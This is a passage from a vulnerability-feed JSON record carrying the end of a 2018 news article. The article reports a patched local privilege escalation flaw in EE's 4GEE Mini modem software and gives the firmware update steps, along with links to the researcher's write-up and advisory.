Patch Your 4G Wi-Fi Mini Modems\n\n \nThe researcher reported the vulnerability to EE and Alcatel in July, and the company acknowledged the issue and rolled out a firmware patch earlier this month to address the vulnerability. \n\n\n \nIf you own a G-based wireless 4GEE Mini modem from EE, you are advised to update the firmware modem to the latest \"EE40_00_02.00_45\" version and remove previous vulnerable versions. \n\n\n[](<https://1.bp.blogspot.com/-qqWBi9h-tdw/W6SvEHN04kI/AAAAAAAAyLg/AnPK13sfKMQxOQWQ0Cj9tdq_iKWeyjvGgCLcBGAs/s728-e100/4g-ee-wifi-modem-hack.jpg>)\n\nFollow these simple steps to update your 4GEE Mini modem to the latest patch update: \n\n\n * Go to your router's default gateway: http://192.168.1.1.\n * Click on the \"Check for Update\" to update your firmware.\n * Once updated to the patched software version EE40_00_02.00_45, remove the previously installed software version from your computer.\nFor more details on the vulnerability, you can head on to [Malith's blog](<https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/>), and the detailed [advisory](<http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html>) released by ZeroDayLab.\n", "modified": "2018-09-21T08:45:25", "published": "2018-09-21T08:45:00", "id": "THN:20C9FC0CFE440CBA16ACA69BAA89C8FF", "href": "https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html", "type": "thn", "title": "Flaw in 4GEE WiFi Modem Could Leave Your Computer Vulnerable", "cvss": {"score": 0.0, "vector": "NONE"}}]}